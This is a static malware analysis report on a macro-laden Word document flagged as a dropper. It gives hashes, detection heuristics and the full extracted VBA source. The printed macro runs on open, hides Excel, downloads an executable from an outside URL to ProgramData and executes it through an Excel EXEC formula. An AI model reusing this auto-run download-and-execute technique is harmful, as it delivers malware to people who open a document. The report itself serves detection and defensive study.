Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 957c82a1872c8b34…

MALICIOUS

Office (OOXML)

18.8 KB Created: 2021-02-17 01:41:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2021-02-23
MD5: cf0890b76a40b0cd103851acf970d4e4 SHA-1: aac6bf1d69f08f24a4d5a1ad9278cd3824523613 SHA-256: 957c82a1872c8b344fb7e6b27b2d85997c0af820f9d417ccc2d2be8d2fa219e3
318 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Sub AutoOpen()
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ExcelSheet = CreateObject("Excel.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Image = Environ("ProgramData") & "\image.exe"
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
    • https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1434 bytes
SHA-256: 8075f19af3ad78a369be151155481387c6f1c5c1b402f20109dc42c1f938b3d3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
    ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub AutoOpen()

Dim ExcelSheet As Object
Dim strMacro As String

Set ExcelSheet = CreateObject("Excel.Application")
Set Workbook = ExcelSheet.workbooks.Add()
Set Worksheets = ExcelSheet.Worksheets
Image = Environ("ProgramData") & "\image.exe"
ExcelSheet.DisplayAlerts = False
ExcelSheet.Application.Visible = 0


Worksheets.Add Before:=Worksheets(1), Count:=1, Type:=4
On Error Resume Next

ExcelSheet.Range("A1").Name = "ok"

ExcelSheet.Range("A108").Value = "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe"
URLDownloadToFile 0, ExcelSheet.Range("A108").Value, Image, 0, 0

ExcelSheet.Range("A109") = "=WAIT(NOW()+""00:00:6"")"

ExcelSheet.Range("A111") = "=EXEC(" + Image + ")"

ExcelSheet.Sheets(1).Visible = 2

strMacro = "ok"

ExcelSheet.Run (strMacro)

ExcelSheet.Application.Quit

Set ExcelSheet = Nothing

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 18432 bytes
SHA-256: 2f891b8b8d6da29d16255643aabc93bdbdc9f28760a621fe8d738adc28aca5f0
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely